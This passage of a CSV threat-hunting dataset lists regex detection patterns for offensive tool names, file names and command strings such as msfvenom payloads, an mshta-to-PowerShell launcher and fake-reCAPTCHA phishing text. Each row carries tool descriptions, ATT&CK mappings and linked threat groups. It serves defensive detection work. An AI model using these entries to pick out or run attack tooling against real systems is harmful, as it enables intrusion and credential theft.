This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","52391" "*msfvenom -p *",".{0,1000}msfvenom\s\-p\s.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","52392" "*msfvenom -p *",".{0,1000}msfvenom\s\-p\s.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","52393" "*msfvenom -p *",".{0,1000}msfvenom\s\-p\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","52394" "*msfvenom -p windows/x64/exec*",".{0,1000}msfvenom\s\-p\swindows\/x64\/exec.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black 
Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","52395" "*msfwrapper.erb*",".{0,1000}msfwrapper\.erb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","52396" "*Mshikaki.exe*",".{0,1000}Mshikaki\.exe.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. 
Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","N/A","9","2","135","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z","52398" "*Mshikaki-main*",".{0,1000}Mshikaki\-main.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","N/A","9","2","135","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z","52399" "*mshta*I am not a robot - *Verification ID: *",".{0,1000}mshta.{0,1000}I\sam\snot\sa\srobot\s\-\s.{0,1000}Verification\sID\:\s.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","N/A","https://x.com/skocherhan/status/1888762808948367410/photo/2","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","52406" "*mshta.exe vbscript:createobject(`""wscript.shell`"").run(`""powershell *",".{0,1000}mshta\.exe\svbscript\:createobject\(\`\""wscript\.shell\`\""\)\.run\(\`\""powershell\s.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","52409" "*mshta.exe*I am not a robot - reCAPTCHA Verification ID: 
*",".{0,1000}mshta\.exe.{0,1000}I\sam\snot\sa\srobot\s\-\sreCAPTCHA\sVerification\sID\:\s.{0,1000}","offensive_tool_keyword","recaptcha-phish","Phishing with a fake reCAPTCHA","T1566.001 - T1204.002 - T1071.003","TA0001 - TA0002","Lumma Stealer","N/A","Phishing","https://github.com/JohnHammond/recaptcha-phish","1","0","N/A","N/A","10","6","534","104","2024-09-13T11:18:29Z","2024-09-13T07:00:40Z","52416" "*mshta/shellcode_inject*",".{0,1000}mshta\/shellcode_inject.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","N/A","10","1127","202","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z","52417" "*MSHTAStager*",".{0,1000}MSHTAStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","52418" "*MSIEXEC - GAC backdoor installed*",".{0,1000}MSIEXEC\s\-\sGAC\sbackdoor\sinstalled.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","0","#content","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","52419" "*MSIL/KeeThief.A!tr.pws*",".{0,1000}MSIL\/KeeThief\.A!tr\.pws.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#Avsignature","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","52467" "*MSIL/PSW.KeeThief.A*",".{0,1000}MSIL\/PSW\.KeeThief\.A.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration 
of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","#Avsignature","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","52468" "*msi-search-main.zip*",".{0,1000}msi\-search\-main\.zip.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","N/A","10","3","276","31","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z","52470" "*msLDAPDump.py*",".{0,1000}msLDAPDump\.py.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","N/A","3","226","31","2024-09-23T18:11:26Z","2022-12-30T23:35:40Z","52471" "*MSOfficeManipulator.cs*",".{0,1000}MSOfficeManipulator\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","52472" "*msol_dump*",".{0,1000}msol_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black 
Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","52473" "*msol_dump.ps1*",".{0,1000}msol_dump\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","52474" "*MSOLSpray *",".{0,1000}MSOLSpray\s.{0,1000}","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003 - T1621","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MSOLSpray","1","0","N/A","network exploitation tool","10","10","964","174","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z","52475" "*MSOLSpray.git*",".{0,1000}MSOLSpray\.git.{0,1000}","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003 - T1621","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MSOLSpray","1","1","N/A","network exploitation tool","10","10","964","174","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z","52476" "*MSOLSpray.ps1*",".{0,1000}MSOLSpray\.ps1.{0,1000}","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003 - T1621","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MSOLSpray","1","1","N/A","network exploitation tool","10","10","964","174","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z","52477" "*MSOLSpray-master*",".{0,1000}MSOLSpray\-master.{0,1000}","offensive_tool_keyword","MSOLSpray","This 
module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003 - T1621","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MSOLSpray","1","1","N/A","network exploitation tool","10","10","964","174","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z","52478" "*mspass.exe*",".{0,1000}mspass\.exe.{0,1000}","offensive_tool_keyword","mspass","MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. and it only works if you chose the remember your password in one of the above programs. You cannot use this utility for grabbing the passwords of other users.","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mspass.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","52479" "*mspass.zip*",".{0,1000}mspass\.zip.{0,1000}","offensive_tool_keyword","mspass","MessenPass can only be used to recover the passwords for the current logged-on user on your local computer. and it only works if you chose the remember your password in one of the above programs. 
You cannot use this utility for grabbing the passwords of other users.","T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/mspass.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","52480" "*msquic_openssl/msquic.dll*",".{0,1000}msquic_openssl\/msquic\.dll.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Exploitation tool","https://github.com/xpn/ntlmquic","1","1","N/A","network exploitation tool","6","2","122","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z","52481" "*msquic_openssl/msquic.lib*",".{0,1000}msquic_openssl\/msquic\.lib.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Exploitation tool","https://github.com/xpn/ntlmquic","1","1","N/A","network exploitation tool","6","2","122","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z","52482" "*MS-RPNVulnerableDC.txt*",".{0,1000}MS\-RPNVulnerableDC\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","52483" "*MS-RPRN.exe *",".{0,1000}MS\-RPRN\.exe\s.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation From attacking machine entice the Domain Controller to connect using the printer bug. 
Binary from here https://github.com/leechristensen/SpoolSample","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","52484" "*MS-RPRN.exe \\* \\*/pipe/pwned*",".{0,1000}MS\-RPRN\.exe\s\\\\.{0,1000}\s\\\\.{0,1000}\/pipe\/pwned.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","52485" "*mssgbox_shellcode_arranged_x64.b64*",".{0,1000}mssgbox_shellcode_arranged_x64\.b64.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","52486" "*mssgbox_shellcode_exitfunc_thread_x64.bin*",".{0,1000}mssgbox_shellcode_exitfunc_thread_x64\.bin.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","52487" 
"*mssgbox_shellcode_x64.b64*",".{0,1000}mssgbox_shellcode_x64\.b64.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","52488" "*mssgbox_shellcode_x64.bin*",".{0,1000}mssgbox_shellcode_x64\.bin.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","52489" "*mssgbox_shellcode_x64.bin*",".{0,1000}mssgbox_shellcode_x64\.bin.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","52490" "*mssgbox_shellcode_x64_with_hexsymbol.txt*",".{0,1000}mssgbox_shellcode_x64_with_hexsymbol\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - 
TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","52491" "*mssgbox_shellcode_x64_without_hexsymbol.txt*",".{0,1000}mssgbox_shellcode_x64_without_hexsymbol\.txt.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","52492" "*mssql_brute.rc*",".{0,1000}mssql_brute\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52493" "*mssql_local_auth_bypass.*",".{0,1000}mssql_local_auth_bypass\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52494" "*mssql_local_hashdump.rb*",".{0,1000}mssql_local_hashdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","52495" "*mssqlattack.py*",".{0,1000}mssqlattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - 
Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","52496" "*mssqlattack.py*",".{0,1000}mssqlattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","52497" "*mssqlproxy-master*",".{0,1000}mssqlproxy\-master.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","N/A","10","8","741","114","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z","52498" 
"*mssqlrelayclient.*",".{0,1000}mssqlrelayclient\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","52499" "*mssqlrelayclient.py*",".{0,1000}mssqlrelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - 
